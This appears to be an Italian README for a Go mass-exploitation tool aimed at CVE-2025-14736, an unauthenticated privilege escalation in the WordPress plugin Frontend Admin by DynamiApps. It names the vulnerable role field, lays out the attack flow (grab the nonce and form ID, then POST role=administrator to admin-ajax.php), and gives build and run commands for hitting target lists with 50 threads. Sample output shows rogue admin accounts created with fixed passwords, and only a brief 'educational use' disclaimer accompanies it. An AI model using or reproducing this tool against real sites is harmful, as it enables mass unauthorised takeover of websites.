
Escalation dei privilegi non autenticata ad Amministratore tramite campo del modulo del ruolo
Autore: Hyun Chiya
| Campo | Valore |
|---|---|
| ID CVE | CVE-2025-14736 |
| Plugin | Frontend Admin by DynamiApps |
| Versioni interessate | <= 3.28.25 |
| Tipo di vulnerabilità | Escalation dei privilegi non autenticata |
| Gravità | Critica |
Il plugin Frontend Admin per WordPress è vulnerabile all'escalation dei privilegi non autenticata a causa di una validazione insufficiente sui campi controllati dall'utente durante la registrazione. Gli attaccanti possono iniettare ruoli arbitrari, incluso administrator, manipolando il payload di invio del modulo.
La logica vulnerabile risiede nella gestione degli invii dei moduli, dove il campo role viene considerato attendibile dall'input utente senza verificare se l'utente è autorizzato ad assegnare quel ruolo. Nello specifico, il campo acff[user][field_user_role_ID] può essere modificato in administrator.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fffgo build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| Argomento | Descrizione |
|---|---|
-l | Percorso del file con l'elenco degli URL target (predefinito: list.txt) |
-t | Numero di thread concorrenti (predefinito: 10) |
-timeout | Timeout della richiesta in secondi (predefinito: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Utilizzalo in modo responsabile.
Hyun Chiya